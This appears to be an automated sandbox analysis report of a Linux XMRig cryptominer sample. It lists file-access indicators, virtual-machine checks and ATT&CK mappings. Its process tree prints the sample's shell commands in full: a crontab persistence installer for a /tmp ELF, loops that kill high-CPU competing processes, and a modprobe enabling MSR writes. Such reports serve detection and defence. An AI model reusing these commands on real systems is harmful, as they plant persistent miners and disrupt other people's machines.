xmrig | 1b26446a1b9dd089fe42f0e9dbee7edcb98f9743981ab95ed86097a3cff5d00b

description	ioc	Process
File opened for reading	/proc/cpuinfo	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/product_name	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.HaGeO6	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 5 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/system/cpu/possible	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/system/cpu/online	ps

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/board_version	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/board_name	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/product_version	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf

Enumerates kernel/hardware configuration 1 TTPs 56 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/node/devices/node0/hugepages	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	Process not Found
File opened for reading	/sys/kernel/mm/hugepages	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/node/devices/node0/meminfo	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/module/msr/initstate	modprobe
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/dax/devices	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/node/devices/node0/cpumap	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/virtual/dmi/id	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/dax/target_node	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/firmware/dmi/tables/DMI	Process not Found
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/dax/devices/target_node	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/devices/system/node/online	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/1160/stat	ps
File opened for reading	/proc/70/status	ps
File opened for reading	/proc/578/cmdline	ps
File opened for reading	/proc/1010/stat	ps
File opened for reading	/proc/1105/stat	ps
File opened for reading	/proc/504/stat	ps
File opened for reading	/proc/273/cmdline	ps
File opened for reading	/proc/76/status	ps
File opened for reading	/proc/784/status	ps
File opened for reading	/proc/93/cmdline	ps
File opened for reading	/proc/81/status	ps
File opened for reading	/proc/1089/status	ps
File opened for reading	/proc/525/cmdline	ps
File opened for reading	/proc/1122/status	ps
File opened for reading	/proc/1297/cmdline	ps
File opened for reading	/proc/1486/cmdline	ps
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/71/stat	ps
File opened for reading	/proc/1209/stat	ps
File opened for reading	/proc/1420/status	ps
File opened for reading	/proc/1480/status	ps
File opened for reading	/proc/397/status	ps
File opened for reading	/proc/1103/stat	ps
File opened for reading	/proc/1454/status	ps
File opened for reading	/proc/1444/stat	ps
File opened for reading	/proc/170/stat	ps
File opened for reading	/proc/311/cmdline	ps
File opened for reading	/proc/1418/cmdline	ps
File opened for reading	/proc/1128/status	ps
File opened for reading	/proc/1415/stat	ps
File opened for reading	/proc/1444/stat	ps
File opened for reading	/proc/158/stat	ps
File opened for reading	/proc/170/cmdline	ps
File opened for reading	/proc/1105/status	ps
File opened for reading	/proc/1471/status	ps
File opened for reading	/proc/172/stat	ps
File opened for reading	/proc/1202/status	ps
File opened for reading	/proc/525/cmdline	ps
File opened for reading	/proc/102/stat	ps
File opened for reading	/proc/592/status	ps
File opened for reading	/proc/89/status	ps
File opened for reading	/proc/92/status	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/1480/status	ps
File opened for reading	/proc/578/cmdline	ps
File opened for reading	/proc/806/stat	ps
File opened for reading	/proc/169/status	ps
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/1480/cmdline	ps
File opened for reading	/proc/1415/status	ps
File opened for reading	/proc/1474/stat	ps
File opened for reading	/proc/1002/stat	ps
File opened for reading	/proc/441/status	ps
File opened for reading	/proc/88/cmdline	ps
File opened for reading	/proc/1485/stat	ps
File opened for reading	/proc/1088/cmdline	ps
File opened for reading	/proc/1417/stat	ps
File opened for reading	/proc/1152/cmdline	ps
File opened for reading	/proc/1483/status	ps
File opened for reading	/proc/79/cmdline	ps
File opened for reading	/proc/490/status	ps
File opened for reading	/proc/911/stat	ps
File opened for reading	/proc/1095/status	ps
File opened for reading	/proc/1414/cmdline	ps

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.lock	a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
File opened for modification	/tmp/.cron	Process not Found
File opened for modification	/tmp/.cron	sh

/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
1⤵
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1474
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done"
  2⤵
  PID:1476
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:1478
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1477
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- 'kthreadds[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- 'kthreadds[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:1483
- - /usr/bin/id
    id -u
    3⤵
    PID:1484
- - /usr/bin/awk
    awk "{if(\$3>30.0) print \$2}"
    3⤵
    PID:1489
- - /usr/bin/grep
    grep -v /usr/sbin/httpd
    3⤵
    PID:1488
- - /usr/bin/grep
    grep -v -- "kthreadds[[:space:]]*\$"
    3⤵
    PID:1487
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1485
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:1486
- /bin/sh
  sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf > /dev/null 2>&1;' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
  2⤵
  - Writes file to tmp directory
  PID:1493
- - /usr/bin/rm
    rm -rf /tmp/.cron
    3⤵
    PID:1495
- - /usr/bin/grep
    grep -v /tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
    3⤵
    PID:1498
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:1497
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:1496
- - /usr/bin/crontab
    crontab /tmp/.cron
    3⤵
    - Creates/modifies Cron job
    PID:1506
- - /usr/bin/rm
    rm -rf /tmp/.cron
    3⤵
    PID:1508
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
  2⤵
  PID:1509
- - /usr/bin/id
    id -u
    3⤵
    PID:1510

/usr/bin/grep
grep "/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf\$"
1⤵
PID:1502

/usr/bin/sort
sort
1⤵
PID:1503

/usr/bin/grep
grep -v grep
1⤵
PID:1501

/usr/bin/uniq
uniq
1⤵
PID:1504

/usr/bin/wc
wc -l
1⤵
PID:1505

/usr/bin/crontab
crontab -l
1⤵
PID:1500

/usr/bin/wc
wc -l
1⤵
PID:1516

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:1515

/usr/bin/grep
grep -- "kthreadds[[:space:]]*\$"
1⤵
PID:1514

/usr/bin/grep
grep -v grep
1⤵
PID:1513

/usr/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:1512

/bin/sh
sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
1⤵
PID:1562
- /sbin/modprobe
  /sbin/modprobe msr "allow_writes=on"
  2⤵
  - Enumerates kernel/hardware configuration
  PID:1563

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Scheduled Task/Job

Privilege Escalation

Scheduled Task/Job

Defense Evasion

Virtualization/Sandbox Evasion

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion